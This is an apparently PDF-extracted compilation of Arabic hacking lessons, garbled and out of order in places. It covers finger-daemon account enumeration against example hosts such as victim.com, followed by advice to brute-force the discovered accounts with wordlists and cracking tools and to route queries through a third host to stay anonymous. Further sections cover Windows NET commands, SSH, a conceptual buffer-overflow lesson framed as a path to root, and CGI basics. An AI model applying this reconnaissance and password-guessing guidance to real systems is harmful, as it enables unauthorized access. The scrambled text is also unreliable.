superscan‬للبحث‬ ‫في موقع معين )مثل ‪ ( /http://www.‫إضافة إلى هذه المعلومات‪ . .‬‬ ‫في الماضي ‪ ،‬الـ ‪ Finger‬إستعمل عامة عن طريق الطلب في الجامعات‬ ‫اذا ارادوا معلومات تخص طلب اخرين في نفس الجامعه‬ ‫وكثيرا ما تكون الجابة )اجابة ‪ ( Finger Deamon‬بجملة " ‪ " !Finger me‬اي "أعلمني ! "‬ ‫أما الن ومع وجود شبكة النترنت العالمية اصبح ‪Finger‬‬ ‫أقل شهرة ‪ ،‬لنه توجد الن‬ ‫مواقع الويب للعمل كبطاقة عمل)‪ (bisinesscard‬رقمية خاصة بمستخدمين النترنت وبسبب ملحظة‬ ‫الناس‬ ‫التهديد الواسع للمن اللكتروني قّل استخدام خدمة ‪Finger Deamon‬‬ ‫على أية حال‪،‬‬ ‫ليس كل النظمة منعت هذه الخدمة وستجد بعض المواقع ) النظمة( تقدم هذه الخدمة‪.

foobar.> <....‫بعد ذلك سيظهر لك برنامج ‪ telnet‬و منه تطبع الوامر ‪.....> Johnson Peter‬‬ ‫‪Mitnick Kevin‬‬ ‫‪Munson Greg‬‬ ‫‪Orwell Dennis‬‬ ‫الن ماذا تعني هذه النتائج؟‬ ‫في العمود الول ) ‪( login‬نرى أسماء المستعملين وفي الثاني )‪" (Name‬السماء الحقيقية"‪،‬‬ ‫التي بالطبع ليست حقيقية‪ ،‬لكن في معظم الوقت حقيقة‪.‬‬ ‫أحيانا توجد أعمدة بعنواوين اليميلت وأرقام هواتف ‪.com‬‬ ‫لحظ المسافة بين ‪ finger‬و ‪www‬‬ ‫اطبع في محث الوامر في يونكس ) على افتراض انك تستخدم ‪: ( unix shell‬‬ ‫‪finger@foobar..com‬كمثال‬ ‫فستظهرالنتائج‪:‬‬ ‫‪:Login: Name: Tty: Idle: When: Where‬‬ ‫‪root foobar sys console 17d Tue 10:13 node0ls3......> <..com‬‬ ‫‪<..‬‬ ‫يرينا العمود الثالث )‪(Tty‬النوع الطرفي ‪the terminal type‬‬ ‫والرابع )‪ (Idle‬فترة التوقف ‪.....‬الخ الخاصة بمستخدمين هذا النظام‬ ‫إذا كنت تريد المزيد من المعلومات عن مستخدم معّين )‪ Johnson Peter‬بيتر جونسن‬ ‫‪59‬‬ ...‬‬ ‫ملحظة ‪ :::‬سيكون الشرح التالي حتى نهاية الدرس لمستخدمي لينوكس أما أذا قررت الستمرار بأستخدام‬ ‫وندوز ستكون كتابة الوامر في موجه الدوس ثم في التلنت وستكون كتابة الوامر نفسها الوامر التي‬ ‫تنكتب بأستخدام نظام لينوكس ولكن بدل "@" نضع "مسافة ثم ‪ "www‬في الوندوز مراعيا اسم الموقع‬ ‫مثل يكون كتابة الوامر في لينوكس هكذا ‪:‬‬ ‫‪finger@anyname..> Amos Amanda‬‬ ‫‪Anderson Kenneth‬‬ ‫‪Bright Adrian‬‬ ‫‪Doe John‬‬ ‫‪<.the idle time‬‬ ‫وبعد ذلك في العمودين الخامس والسادس‬ ‫الوقت والمكان الذي استخدم فيه الحساب للتصال بالنظام‪....> <...com‬‬ ‫ولكن في وندوز سيكون هكذا ‪:‬‬ ‫‪/finger http://www.....foobar.anyname...‬‬ ‫اما من يونيكس‬ ‫لسنا بحاجة إلى أن نستعمل تيلنت لنه يوجد بنظام لينوكس زبون)‪(client‬خاص بخدمة ‪Finger‬‬ ‫‪Deamon‬‬ ‫مرّكب على النظام بشكل دائم تقريبا‪.....com‬‬ ‫لحظ ان الهدف )الموقع المرادالستعلم عنه مثل معرفة من هم مستخدمينه ( هنا هو‬ ‫‪ /http://www.> <.

‬‬ ‫وخاصة حساب الدارة )‪ (Admin‬أو الجذر)‪ (root‬بسبب انه عندما تعرف الباسوورد الخاص بهم‬ ‫وقتها تستطيع التحكم بالموقع ‪ .com‬‬ ‫‪ 1.Finger‬‬ ‫‪ Finger deamon‬يريك ماهي الحسابات الموجوده على النظام‪.bruteforce‬أنصحك بهذا الوقت ان تحظر لك كأس شاهي وتأخذ لك استراحة‬ ‫وتجعل البرنامج يعمل عمله‪-‬‬ ‫بالطبع نجد بعض الحسابات للمستخدمين للنظام اكثر اهمية من غيرها من الحسابات‪.‬‬ ‫هناك بعض الخدع لمعرفة هذا النوع من الحسابات‪ .@foobar.‬وبالطبع بعض الحسابات سهلة تخمين كلمة السر ‪.thehackerschoice.5‬الستعلم عن طريق موقع بأستخدام ‪Finger‬‬ ‫> =========================‬ ‫‪60‬‬ .‬‬ ‫اذا‪ ،‬ماهو الشي المهم في هذا؟ حسنا أنت يمكنك أن تستعمل "‪ "test‬أو "‪ "temp‬أو "‪"0000‬‬ ‫بدل من "‪ "secret‬وكما تعرف من المحتمل ان يكون هذاالنوع من الحسابات‬ ‫سهل معرفة باسوورداته في أغلب الحيان‪.‬‬ ‫إذا عرفت أسماء المستخدمين‪ ،‬ستكون الخطوة القادمة متوقفه على برنامج ‪ bruteforce‬أو‬ ‫بمعنى آخر برامج تخمين الباسوورد ‪worldist password cracker‬‬ ‫صة كتبت للتيلنت على سبيل المثال‬ ‫هناك سكربتات خا ّ‬ ‫اذهب لموقع ‪ /http://www.‬‬ ‫هذا يعني أنك تكسب )عن طريق قانوني ( ‪ % 50‬من المجموعة السحرية وهي‬ ‫كلمات السر‪/‬مجموعة أسماء المستخدمين التي ستمنحك الدخول )‪(Access‬إلى نظام‪.‬‬ ‫‪finger .com‬‬ ‫‪finger 0@foobar.com‬أو ابحث عن‬ ‫‪VLAD's pwscan.‫على سبيل المثال( أدخل المر التالي‪:‬‬ ‫‪finger johnson@foobar.‬على سبيل المثال‬ ‫إطبع المر‪:‬‬ ‫‪finger secret@foobar.4‬بعض الخدع عند استخدام خدمة ‪Finger‬‬ ‫> =========================‬ ‫===========<‬ ‫أتمّنى الن شاهدت ما الضعف الرئيسي لخدمة ‪.com‬‬ ‫جرب هذه الوامر وشاهد ما يحدث!‬ ‫حاول التعرف على ‪ ،Finger Deamon‬أقرأ ‪ RFC‬وأوجد خدعك بنفسك!‬ ‫‪ 1.pl‬‬ ‫لذلك يجب عليك ان تكون قائمة بكلمات السر في ملف نصي )‪ word‬او المفكره(‬ ‫وحاول ان تكون كلمات السرقريبة من أسماء المستخدمين وإذا لم تعمل القائمة‬ ‫استخدم برنامج ‪.com‬‬ ‫عندما ترسل هذا المر الي ‪ Finger Deamon‬سيعطيك جميع الحسابات‬ ‫التي تحتوي على كلمة "‪ "secret‬أّما في اسم المستعمل أو السم الحقيقي‪.

com‬يقدم خدمة ‪ Finger‬تعمل‪،‬‬ ‫عندها يمكنني ان أقدم طلبا مثل هذا‪):‬اكتب في محث الوامر مثل هذا(‬ ‫‪finger@host.‬‬ ‫‪1.‬‬ ‫‪ Finger deamon‬قانونيا يزّودك بنصف كلمات السر واسماء المستخدمين‬ ‫التي تحتاجها لكسب الدخول ‪.com‬‬ ‫فعندما تقوم ‪/http://www.‬‬ ‫فائدة اخرى وهي أنك يمكن ان تترك ‪) Host‬موقع( يقوم ) عن طريق خدمة ‪( Finger‬بالستعلم عن‬ ‫حاسوبا‬ ‫آخرا على نفس الشبكة ‪ ،‬بينما اذا طلبت انت هذا الستعلم بأستخدام خدمة ‪ Finger‬من جهازك‬ ‫لن تكون مسموحة لك لنك سأكون غير موثوق به لدى المستعلم عنه‬ ‫بعكس اذا كان الطلب للستعلم باستخدام ‪ Finger‬عن طريق موقع ‪.‬‬ ‫أحدالفوائد من هذه الطريقة انك ستكون مجهول لدى ‪victim.com‬ويريك النتائج‪.com@victim.com‬‬ ‫‪ Host.host.6‬الستنتاج من هذا الدرس‬ ‫>=======================<‬ ‫‪ Finger Deamon‬يمكن أن يكون مصدر معلومات ضخم لي واحد يحاول‬ ‫كسب الدخول) ‪ ( access‬إلى نظام‪.bruteforce‬‬ ‫تذّكر فوائد "الستعلم عن طريق موقع"أيضا بأستعمال ‪.‬‬ ‫يعني الخلصة ‪ :‬ان الموقع الذي تريد الستعلم عنه يعتبر حاسوبك الشخصي غير موثوق به بعكس‬ ‫اذا كان الستعلم عن طريق موقع اخر يشابهه فسوف يسمح له !‪.host.com‬‬ ‫وأيضا تعرف أن موقع آخر "‪ "www.victim.access‬‬ ‫هناك بضعة خدع لطيفة تمكنك من معرفة حسابات خاصة تبحث عنها‬ ‫من معرفتك لهذه الحسابات تستطيع كسر الباسووردات ‪ ،‬بإستعمال تقنية ‪ wordlist‬أو ‪.‫=============<‬ ‫إذا أردت ان استخدم خدمة ‪) Finger‬معنى ‪ Finger‬كفعل "ألمس" ولكنها تأتي هنا بمعنى "استعلم"(‬ ‫والستعلم عن موقع معين مثل هذا"‪"www.Finger deamon‬‬ ‫انتهى‪،،،‬‬ ‫‪61‬‬ .com‬في سجلتهم‪ ،‬بدل منك ‪.com‬يستعلم )‪ (Finger‬الن ‪ victim.victim.com‬‬ ‫بطلب سجل )الدخول ‪ (log‬ستشاهد ‪ /http://www.

net‬تملك‬ ‫أوامر ‪ net‬هذه بعض الخصائص المشتركة‪:‬‬ ‫يمكنك مشاهدة قائمة بكافة أوامر ‪ net‬المتوفرة بكتابة ?‪ net /‬في موجه‬ ‫الوامر‪.‬‬ ‫‪62‬‬ .‬على سبيل المثال‪ ،‬للحصول‬ ‫على تعليمات المر ‪ ،net accounts‬اكتب مايلي‪:‬‬ ‫‪net help accounts‬‬ ‫تقبل كافة أوامر ‪ net‬خيارات سطر الوامر ‪) /y‬نعم( و ‪) /n‬ل(‪ .710‬يومًا(‪ ،‬والقيمة الفتراضية هي ‪ 90‬يومًا‪.‬‬ ‫إذا كان اسم الخدمة يحتوي على فراغات‪ ،‬استخدم علمات القتباس حول النص‬ ‫)أي‪ .‫" شرح مختصر لدارة الشبكة بإستخدام المر ‪" NET‬‬ ‫>ةةةةة ةة ةةةة ةةةة<‬ ‫تستخدم العديد من الخدمات أوامر شبكة التصال التي تبدأ بالكلمة ‪ .("Service Name " ،‬على سبيل المثال‪ ،‬يشّغل المر التالي خدمة ‪net‬‬ ‫‪:logon‬‬ ‫"‪net start "net logon‬‬ ‫‪ unlimited‬يكافئ ‪ 49.‬‬ ‫يمكنك الحصول على تعليمات بناء الجملة في سطر الوامر لمر ‪ net‬عن طريق‬ ‫كتابة ‪ net help command‬في موجه الوامر‪ .‬على سبيل‬ ‫المثال‪ ،‬يطالبك المر ‪ net stop server‬بتأكيد رغبتك في إيقاف كافة خدمات‬ ‫الملقم التابعة‪ ،‬بينما يتجاوز ‪ ،net stop server /y‬عن طريق الجابة بنعم‬ ‫تلقائيًا‪ ،‬المطالبة بالتأكيد ويعمل على إيقاف تشغيل خدمة الملقم‪.

‬‬ ‫‪63‬‬ .‫ن بتسجيل الخروج من شبكة التصال فورًا‪.

64 .

‬‬ ‫‪ net file /cl‬لزالة التأمين وإغلق الملف‪ .‫الوصف‬ ‫لقم‪.‬إن إخراج ‪ net file‬مشابه لمايلي‪:‬‬ ‫‪65‬‬ .

‫احد بالعلمة النجمية )*(‪.‬‬ ‫‪66‬‬ .

67 .

(Sales\Ralphr ،‬‬ ‫‪68‬‬ .‫جال )على سبيل المثال‪.

‫انتهى‪،،،‬‬ ‫"شرح الـ ‪"secure shell‬‬ ‫>ةةةةة ةة ةةةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪<ACID BURN_EG :‬‬ ‫السلم عليكم و رحمه ال و بركاته ‪:‬‬ ‫اليوم سوف نتطلع الى اداه فى النت ورك و هى اداه هامه جداا تستخدمها معظم السرفرات على النترنت و‬ ‫هذه الداه هى ال ‪ Secure Shell‬اى ال ‪:: SSh‬‬ ‫‪69‬‬ .

rsh and‬‬ ‫‪.commands‬فى‬ ‫يونكس ==================================================‬ ‫======================================‬ ‫كالمذكورين فى العلى ؟‬ ‫======================‬ ‫فى توزيعات اليونكس مثل ال *‪ BSD‬تتعرض الدوات التى يطلق عليها ‪ r.‬‬ ‫و هنا يأتى سؤال مهم ‪ ::‬و السؤال هو ‪::‬‬ ‫لماذا يفضل استخدام ال ‪ secure shell‬على الدوات الخرى التى يطلق عليها ‪ r.commands‬مثل )‬ ‫‪ (rlogin.rsh and rcp‬الى انواع مختلفه من الهجمات حيث انه لو شخص استطاع ان يكتسب ال روت‬ ‫اكسيس )‪ (root access‬للجهزه التى على الشبكه بطريقه ما او فعلها ن طريق اتصال فيزيائى اى‬ ‫ريموتلى يمكنه ان يدخل الى كل بيانات الجهزه التى على الشبكه بدون ادنى صعوبه لنه يستطيع بالروت‬ ‫اكسس ان يعبر من خلل اى اداه من المذكوره فى يونكس بدون اى صعوبه و يمكنه تفاديها بطرق معينه و‬ ‫هذا ما يسمى بأن الشخص لديه ‪ unauthorized access to systems‬اعتقد انكم فهمتونى الن و‬ ‫يمكن ايضا لى شخص ان يراقب و النت ورك ترافيك و يلتقط كل الباكيدجس من خلل شبكتك و تكون هذه‬ ‫الباكيدجس تحتوى على الباسوردس للسيستم حق شبكتك‬ ‫ملحوظه‪ :‬طريقه مراقبه النت ورك ترافيك هى طريقه حقيقيه فى الختراق و تستخدم فى اختراق المنظمات‬ ‫الكبرى و تقع تحت بند تقفى الثر و العداد للختراق (‬ ‫و الن نعود الى السيكيور شيل و مزايا السيكيور شيل تظهر هنا مع كل عيوب الدوات فى يونكس فالسيكيور‬ ‫شيل يطالب الشخص الذى لديه الروت اكسس ايضا بأن يتصل اتصال موثوق عبره اى ل يعطيه الحق للدخول‬ ‫الى بيانات اجهزه الشبكه ال بالباسورد و ل يمكن التحايل على ال ‪ ssh‬فى هذه النقطه و بذلك حتى لو تمكن‬ ‫الشخص من اكتساب الروت اكسس لن يستطسع الطلع على بيانات الشبكه‬ ‫ال ب ‪. authorized access to systems‬‬ ‫و النقطه الثانيه هى ان اذا حاول احد اختراقك عن طريق مراقبه النت وررك ترافيك لشبكتك و التقاط‬ ‫الباكيدجس التى تحمل معلوماتك و باسورداتك فسيخيب امله لن السيكيور شيل ل يرسل الباسوردات فى‬ ‫صوره واضحه كما ترسلها ادوات يونكس الخرى و لكن يرسلها مشفره و لذلك سيكون على المخترق‬ ‫محاوله فك الشفره و الخ‬ ‫و لكن مع كل هذه المزايا لم يخلى ال ‪ secure shell‬من الثغرات و لكن تعتبر ثغراته قليل و تقريبا‬ ‫معظمها يحتاج الى الرووت اكسس و الخرى يمكن ان تخترق السيكيور شل فقط بها )هذا كلم بينى و بينكم(‬ ‫و الن سؤال اخر ‪::‬‬ ‫ما هى انواع الهجوم التى تحمى منها ال ‪ ssh‬؟‬ ‫‪70‬‬ .(rcp‬‬ ‫و تقدم ايضا ال ‪ secure shell‬اتصال امن جداا لشحنات اتصالت ال ‪ tcp‬كونيكشن ‪.‫و لنبدأ الن الحديث عنها ‪::‬‬ ‫ما هى ال ‪ SSh‬؟‬ ‫===============‬ ‫ال ‪ secure shell‬هى اداه )برنامج( للتصال و الدخول الى كمبيوتر او جهاز اخر على النت ورك لتنفيذ‬ ‫اوامر او مهام معينه داخل هذا الجهاز اى و هو التصال عن بعد ‪ remotely connection‬و تستخدم‬ ‫ايضا فى نقل الملفات من كمبيوتر الى اخر و هى تقدم توثيق قوى و اتصال امن جداا فى قنوات التصال الغير‬ ‫امنه و هى تعتبر كبديل جيد جداا لدوات تستعمل لنفس الغرض فى يونكس مثل )‪rlogin.

‫===========================================‬ ‫‪ -1‬تحمى من ال ‪ ip spoofing‬اى تحمى من انتحال عنواين الى بى حيث انه لو ارسل شخص ما‬ ‫باكيدجس من اى بى يظهر انه موثوق به و لكنه فى الحقيقه ليس موثوق به يكشفه ال ‪ ssh‬و تحمى ايضا‬ ‫ال ‪ ssh‬من المنتحلين على الشبكه المحليه اى ‪. Buffer Overflows‬وانشال تستفيدون منه‬ ‫يله نبدأ‬ ‫‪71‬‬ .‬‬ ‫و ايضا كل الشياء التى تكلمنا عنها فوق سوف تعمل فقط اذا كنت تستخدم خاصيه التشفير التى تسمح لك بها‬ ‫ال ‪ ssh‬و هى تسمح بأكثر من نوع تشفير مثل )‪three-key triple-DES.‬‬ ‫‪ (TSS. localy‬‬ ‫‪ -2‬تحمى مما يسمى ال ‪DNS spoofing‬‬ ‫‪ -3‬تعترض ظهور التيكستس التى يكون مخزن عليها الباسوردات الواضحه و بيانات الهوستس‬ ‫‪ -4‬تحميك من معالجه البيانات المخزنه اى تمنع اى شخص غير موثوق به من عمل ايديت لى داتا مخزنه‬ ‫و لكن مع كل هذا فأن ال ‪ ssh‬ليس امن بدرجه كبيره حيث ان الشخاص ذو خبره كبيره فى النت ورك‬ ‫يستطيعون ان يجعلون ال ‪ ssh‬ينقطع عن التصال اى ‪ disconnected‬و لكن ل يمكن ان يكسرو تشفير‬ ‫بياناته او يعيدون تشخيل الترافيك الذى كان ينقلها ‪.‬‬ ‫انتهى‪،،،‬‬ ‫" شرح معنى الـ ‪"Buffer Overflows‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫>ةةةةةة‪<LAMeR :‬‬ ‫اقدم لكم درس يشرح ما معنى الـ ‪ . RC4-128.‬‬ ‫اذن فهى اداه حقا مميزه و تستحق الحترام و الهتمام مع انها ل تخلو من الثغرات و لكن لنجعلها افضل ما‬ ‫موجود فى هذا المجال‬ ‫ارجو ان اكون قد افدتكم فى هذا الدرس بالتعرف على اداه مثل السيكيور شيل و ارجو ان اكون عند حسن‬ ‫ظنكم‪.‬حيث ان هذا التشفير‬ ‫ايضا يمنع ال ‪ ip spoofing‬و ال ‪ DNS spoofing‬و هذا ايضا بالضافه الى تغيير مفاتيح فك التشفير‬ ‫كل فتره معينه و يتم تدمير مفاتيح التدمير التى تم استعمالها تماما ‪. Blowfish‬يمكنك استخدام ما تريد منهم و ايضا هناك اوبشن اى خيار فى الداه تسمح لك بعدم‬ ‫تشغيل التشفير اى" ‪ encryption of type "none‬و بهذا تجعلنى اقول عليك احمق ! لن هذا يجعل‬ ‫ال ‪ ssh‬سهله الختراق مثل الدوات التى تم ذكرها فى اول الموضوع فى يونكس ‪ .. DES.

‬المتغّير الذي حجمه ‪ 15‬بايت‬ ‫وهو الذي سيحتوي السم الذي سيدخله المستخدم(‬ ‫نفترض ان المستخدم سيدخل السم " ‪abcabcabcabcabcabcabcabca‬‬ ‫‪ "bc‬حينها ستبدو الذاكره هكذا‪:‬‬ ‫‪somevalue2avalusabcabcabc‬‬ ‫‪abcabcabcabcabcabc‬‬ ‫>‪<var1 ><var2><vname ><other things go here‬‬ ‫اذا ماذا حدث ؟؟ المتغّير ‪" vname‬طفح ‪ "overflowed‬بسبب البيانات المدخلة عليه من قبل المستخدم‬ ‫‪72‬‬ .‬‬ ‫المشكلة هنا تكمن في انه إذا كان المتغّير مخصص لتخزين بيانات حجمها القصى يساوي ‪ 15‬بايت والبيانات‬ ‫هنا)وهي اسم المستخدم(حجمها ‪ 25‬بايت التي ستخزن في المتغير )يتضح لنا ان اسم المستخدم وضع في‬ ‫مكان اقل من حجمه (‪.‫محتويات الدرس‪:‬‬ ‫‪ -1‬ما هو الـ ‪ Buffer Overflow‬؟‬ ‫<‪--------------------------‬‬ ‫‪ -2‬المعالجه)‪(Proccess‬‬ ‫<‪-----------------‬‬ ‫‪ -3‬إدارة الذاكره )‪(Memory management‬‬ ‫<‪--------------------------------‬‬ ‫‪-4‬استغلل ماذكر في الـ ‪Buffer Overflow‬‬ ‫<‪----------------------------------‬‬ ‫* ماذا يجب أن أعرف قبل أن أقرأ هذه المقالة؟‬ ‫ليس الكثير‪ ،،،‬فهذا دليل اساسي لك اذن فقط تحتاج ان تكون لديك معرفة أساسية بمفهوم برامج الحاسوب‬ ‫وإدارة الذاكرة‬ ‫‪-1‬ما هو الـ ‪Buffer Overflow‬؟‬ ‫<‪>-----------------------‬‬ ‫‪ Buffer Overflow‬حالة تحدث لبرنامج بسبب برمجة سيئة أو بمعنى اخر برمجة تحمل أخطاء‪.‬‬ ‫بايت( و القيمة التي خ ّ‬ ‫خذ هذا المثال‪:‬‬ ‫يظهر برنامجي على الشاشة هذه الجملة‪" :‬رجاء إطبع اسمك الول‪" :‬ثم سيأخذ برنامجي من المستخدم‬ ‫البيانات التي سيدخلها وهي )اسمه الول( ثم توضع في متغير فتظهر في برنامجي او تخزن‪.‬‬ ‫احدث ثغرة يمكنك أستغللها من نوع ‪ Buffer Overflow‬تسمى فايروس '‪ ، 'code red‬التي أستغلت‬ ‫في خادم ‪ IIS‬لمايكروسوفت ‪.‬‬ ‫خ ّ‬ ‫صص الذاكرة ‪:‬‬ ‫عندما يبدأ البرنامج‪ ،‬تخ ّ‬ ‫>‪<var1><var2><vname><Other things in memory‬‬ ‫‪10b 6b 15b‬‬ ‫)‪ var 1‬و ‪ var 2‬متغّيرات ليست لها علقة بالسم المدخل ‪ vname.‬‬ ‫اذن ماذا سيحدث للبيانات الزائدة عن ‪ 15‬بايت من المؤكد انها سـ"تطفح ‪ "Overflow‬على الذاكرة التي‬ ‫صصت لمتغّير السم‪.MS web server-‬‬ ‫عموما‪ ،‬يحدث ‪ Buffer Overflow‬عندما يظهر برنامج ما متغّير بحجم ثابت )على سبيل المثال‪،‬حجم ‪20‬‬ ‫صصت إلى هذه المتغّير أكبر من حجم المتغّير‪.

‬‬ ‫ذلك يعني بأّنه ليمكن لي تطبيق )برنامج مثل( الوصول مباشرة إلى الذاكرة الحقيقية‪.‬‬ ‫العنوان التخيل ّ‬ ‫و هنالك استخدام اخر للذاكرة الفتراضية)التخيلّية( وهي انه من المعلوم أن الذاكرة الحقيقية ل ترتبط مباشرة‬ ‫بكل عملية )أو برنامج(‪ ،‬فنظام التشغيل يستخدم مساحة على القرص الصلب كذاكرة‪،‬‬ ‫والتطبيق ل يمكنه أبدا معرفة مكان الذاكرة ) مكان الذاكرة الحقيقة (‪،‬ذلك لن المساحة المخصصة للذاكرة في‬ ‫القرص الصلب تتبدل وتتغير‪.‬‬ ‫اذن كيف أستغّل هذا الخطأ؟؟؟‬ ‫قبل أن نصل إلى الجواب‪ ،‬هناك بعض الشياء الساسية المهمة التي يجب علينا أن نعرفها حول تركيب وبنية‬ ‫الحاسوب ‪..‬‬ ‫في هذه المقالة سنناقش نظام لينكس ‪ ،linux‬لكن المفهوم مماثل لباقي النظمة‪.‫و قيمة "‪ other things in memory‬أشياء اخرى في الذاكره" تغّيرت بسبب فيض)‪(overflow‬‬ ‫الحروف من ادخال المستخدم‪..:‬ان الذاكرة ل تنقسم الى ذاكرة حقيقة وذاكرة افتراضية بل أنهما ينتميان لذاكرة واحد‬ ‫اذن ما فائدة التسمية الى حقيقية وافتراضية ؟؟ الجواب هو للمتييز فقط ‪ ،‬حيث ان الذاكرة الحقيقة تمثل‬ ‫مساحة معينة من القرص الصلب )ومكان هذه المساحة في تغير مستمر( لذلك سميت حقيقية او بمعنى اخر‬ ‫طبيعية )اي بأستطاعتك لمس مكان الذاكرة الطبيعية بيدك على القرص الصلب(‬ ‫وفائدة الذاكرة الفتراضية هي إعطاء عنوان افتراضي )غير حقيقي ( للذاكرة الحقيقية اي يعطي عنوان كأسم‬ ‫فقط لمكان مساحة الذاكرة الطبيعية في القرص الصلب ‪ ،‬وإن تغير مكان المساحة المخصصة للذاكرة يظل‬ ‫العنوان الفتراضي)التخيلي( ثابت‪.‬‬ ‫وهذا يرشدنا الى شي اخر يجب ان تفهمه وهو‪:‬‬ ‫‪-3‬إدارة الذاكره )‪:(Memory management‬‬ ‫<‪>------------------------------‬‬ ‫تدير أنظمة التشغيل‪-operating systems-‬الحديثة ذاكرة افتراضية ‪)virtual memory‬تخيلية(‪..‬لماذا؟؟‬ ‫انظمة التشغيل ‪ Operating System‬تمتلك جدول تخطيط "تحويل العناوين الحقيقية من الذاكرة الى‬ ‫عناوين افتراضية)تخيلية(" ‪.‬‬ ‫وعندما تقوم ذاكرة الـ ‪) OS‬نظام التشغيل(بتحديد مكان في الذاكرة لبرنامج معين لتشغيله ‪،‬يأخذ البرنامج‬ ‫ي فقط ‪ ،‬وليس العنوان الطبيعي‪.‬‬ ‫‪-2‬المعالجه)‪:(Proccess‬‬ ‫<‪>----------------‬‬ ‫ن الوحدة الوظيفية الساسية في حاسوب يعمل هي عملية المعالجه )‪.‬‬ ‫ن وحدة المعالجة‬ ‫ليس هناك شيء إسمه "متعددالعمليات ‪ "Multi.(Proccess‬في الحاسوب هنالك‬ ‫إّ‬ ‫العديد من العمليات ونظام التشغيل مسؤول عن تقسيم القّوة التي تجعل العديد من العمليات تعمل في نفس‬ ‫الوقت في الحاسوب‪.‬‬ ‫توضيح ‪ .proccesses‬صحيح‪ .‬كيف اذن؟؛ ا ّ‬ ‫المركزية)‪ (CPU‬تنتقل بين العمليات كُل على حده بسرعة كبيره بحيث تبدو مثل العديد من المهام التي تعمل‬ ‫في وقت واحد‪،‬‬ ‫اذا تبدو لنا كأن العمليات تعمل في وقت واحد وهذه من خدع الحاسوب التي يؤديها علينا ‪. (:‬‬ ‫كّل عملية لها عنوان فاضي من الذاكره ‪ ،‬وليمكن لي عمليةآخرى تدخل في هذا المكان الفاضي من الذاكرة‪.‬‬ ‫‪-4‬استغلل ماذكر في الـ ‪Buffer Overflow‬‬ ‫<‪>---------------------------------‬‬ ‫الن نصل إلى الجزء الهم والمرح‬ ‫‪73‬‬ .

‬‬ ‫انتهى‪،،،‬‬ ‫" الـ ‪ CGI‬وعلقتها بالنترنت "‬ ‫>ةةةةة<‬ ‫>ةةةةة ةة ةةة‪<King_abdo :‬‬ ‫في هذا الملف سوف نقوم بعرض مقدمة الـ ‪ CGI‬و علقتها بالنترنت‬ ‫‪74‬‬ .‬‬ ‫ماذا نعمل في ذلك المكان‪ :‬داخل خط )مكان( البيانات التي يدخلها المستخدم )في المثال السابق وهو السم‬ ‫الول الذي يطلب من قبل البرنامج ثم أدخلناه ( نضع الوامر الكثر شعبية للحاسوب‪ ،‬حيث هذه الوامر تجعل‬ ‫الحاسوب يحدث)ينتج( هيكل نستطيع استخدامه فيما بعد للقيام بالسيطرة الكاملة للنظام المستغّل‪ .‬القيام بهذا‬ ‫العمل ليس بيسطا كما يبدو لك‪ ،‬إذن لو أردت معرفة كيف يعمل ‪ ،‬أنت يجب أن تقرأ المقالة القادمة حول‬ ‫‪ ،Buffer Overflows‬الذي سيصف بالضبط كيف لستغلل واحده من الـ ‪ Buffer Overflows‬في‬ ‫الختراق‪.‬‬ ‫اخيرا اتمنى انكم فهمتوا الدرس زين وعرفتوا ايش معنى ‪ Buffer Overflow‬واللي فهم الدرس نص‬ ‫نص يعيد قرائته اكثر من مرة مع التدقيق وانشال يفهم‪.‫كيف نستفيد من الذي قلنا عن المعالجة وإدارة الذاكرة للوصول والدخول الى الجذر )‪ (Root‬وأختراق‬ ‫النظام؟ تذّكر نحن قلنا في وقت سابق بأّنه عندما يكون الدخال)البيانات( من المستخدم أكبر حجما من الذاكرة‬ ‫صصت لهذه البيانات‪ ،‬البيانات الزائدة ستفيض )‪ (overflow‬في الذاكرة التي بعد السم المتغّير؟ هذا‬ ‫التي خ ّ‬ ‫المكان من الذاكرة هو المكان الذي نستفيد منه في الختراق‪.

‫)‪ (1‬مقدمة للـ ‪CGI‬‬ ‫‪ CGI=COMMON GATEWAY INTERFACE‬هي الواجهة التي تسمح بالتصال بين جانب‬ ‫المستخدم عن طريق المتصفح أو البرامج‬ ‫و خلفه و جانب الويب سيرفر الذي يفهم بروتوكول )‪(HTTP‬‬ ‫الـ ‪ TCP/IP‬هو البروتوكول الذي يستخدمه سكريبت السي جي أي و السيرفر أثناء التصال ‪ .‬البورت‬ ‫المحددة‬ ‫لهذا البروتوكول هي ‪ ) 80‬من الممكن أن تتغير هذه البورت(‬ ‫تستطيع سكريبتات السي جي أي أن تقوم بتوليد صفحات الويب و الصور و أيضا نتائج محددة طبقا لمدخلت‬ ‫معينه يقوم‬ ‫مبرمج السي جي أي بتحديدها‬ ‫يقوم عمل سكريبتات السي جي أي علي خطوتين أساسيتين ‪:‬‬ ‫‪ -1‬في الخطوة الولى يقوم السكريبت بعمل معالجة أوليه للبيانات التي أدخلت له‬ ‫‪ -2‬في الخطوة الثانية يعمل السكريبت كقناه للبيانات التي يقوم المتصفح بارسالها الي السيرفر أو العكس‬ ‫يقوم سكريبت السي جي أي بتشفير البيانات حتي تتمكن من العمل في أي مناخ للعمل‬ ‫يمكن كتابة سكريبت السي جي أي بأي لغة برمجة سواء كانت لغة مجمعة مثل الفيجوال بيسك‬ ‫أو لغة مترجمة مثل البيرل و الفرق الوحيد بين نوعين اللغات أن البرنامج‬ ‫المبرمج باللغة المجمعة سوف يكون أسرع في التنفيذ و لكن اللغات المترجمة أسرع في عملية التطوير‬ ‫للسكريبت اذا أردت أن تعمل علي تعديل السكريبت أو تطويره‬ ‫‪75‬‬ .

‬كمثال يمكن الوصول الي الملفات الغير محمية باستخدام الـ ‪ FTP‬أو ‪..‫أهم الوامر التي تعتبر وثيقة الصله لموضوعنا هي كالتالي ‪:‬‬ ‫‪ GET -1‬هذا المر يقوم بطلب بيانات من السيرفر للمتصفح‬ ‫‪ POST -2‬هذا المر يطلب من السيرفر قبول المعلومات المدخلة اليه من المتصفح‬ ‫‪ PUT -3‬هذا المر يطلب من السيرفر قبول المعلومات المرسله اليه كبديل عن المدخلت الموجودة حاليا‬ ‫)‪ (2‬نقاط الضعف‬ ‫نقاط الضعف التي يسببها سكريبت السي جي أي ليس ضعفا في السي جي أي نفسه و لكنه‬ ‫ضعف في بروتوكول الـ ‪ HTTP‬أو في أنظمة التشغيل المختلفة‬ ‫السي جي أي يسمح باستغلل نقاط الضعف الموجودة و لكن هناك طرق أخري للوصول الي تحطيم النظام‬ ‫المني ‪ ..TELNET‬‬ ‫انتهى‪،،،‬‬ ‫" كيف تحمي نفسك وتخفي أفعالك؟!"‬ 